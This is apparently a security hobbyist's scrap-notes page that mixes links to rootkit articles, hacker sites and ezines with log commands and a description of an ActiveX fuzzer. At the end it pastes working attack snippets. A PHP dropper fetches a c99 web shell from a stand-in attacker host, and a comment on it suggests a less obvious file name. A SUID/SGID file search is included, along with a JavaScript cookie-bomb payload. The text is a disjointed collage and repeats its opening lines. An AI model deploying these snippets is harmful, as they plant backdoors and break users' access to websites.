A very well written article on some of the history and details of what a “rootkit” is:
http://www.omninerd.com/articles/r00tkit_Analysis_What_Is_A_Rootkit/print_friendly
A very well written article on some of the history and details of what a “rootkit” is:
http://www.omninerd.com/articles/r00tkit_Analysis_What_Is_A_Rootkit/print_friendly
Here are just some sites that I wanted to get off my open tabs and check out later – standard warning applies, do not inherently trust what you find on these pages:
http://www.darkc0de.com/index.shtml
http://trythis0ne.com/?page=toolz
http://avhackers.com/index.php
http://www.megapanzer.com (Yes you have seen this one before, but in reference to their RAT)
================================
Un.Aware eZine ( http://www.awarenetwork.org/etc/)
Uninformed eZine ( http://uninformed.org/? )
Phrack eZine ( http://phrack.org/ )
Phrack issue #64 by TCOLH - “A brief history of the Underground scene: ( http://phrack.org/issues.html?issue=64&id=4&mode=txt )
tail -f
less +F /var/log/messages
a big hairy fuzzy spider that crawls your site, wreaking havoc
Attackers frequently take advantage of vulnerabilities in ActiveX controls to compromise systems using Microsoft Internet Explorer. A programming or design flaw in an ActiveX control can allow an attacker to execute arbitrary code by convincing a user to view a specially crafted web page. Since 2000, we have seen a significant increase in vulnerabilities in ActiveX controls.
We have developed Dranzer, a tool that enables users to examine effective techniques for fuzz testing ActiveX controls. By testing a large number of ActiveX controls, we can provide some insight into the current state of ActiveX security. When we discover new vulnerabilities, we practice responsible disclosure principles and perform the necessary remediation steps.
$shell = "http://attacker.com/c99madshell.txt"; //use something less obvious like readme.txt
$code = file_get_contents($shell);
$fp=fopen("Sh3ll.php","w+");
fwrite($fp, $code);
fclose($fp);
?>
find / -type f \( -perm -04000 -o -perm -02000 \) \-exec ls -lg {} \;
/*<script>/*code to create a 200KB of cookies per subdomain*/with(document)domain.replace(/[^.]*\.?/g,function(a){try{domain=domain.replace(a,"")}catch(e){a=""}finally{for(i=0;i<50;i++)cookie=i+"="+Array(4095)+";expires=9 Jan 2038 23:59 GMT;path=/;domain=."+a+domain}})//</script>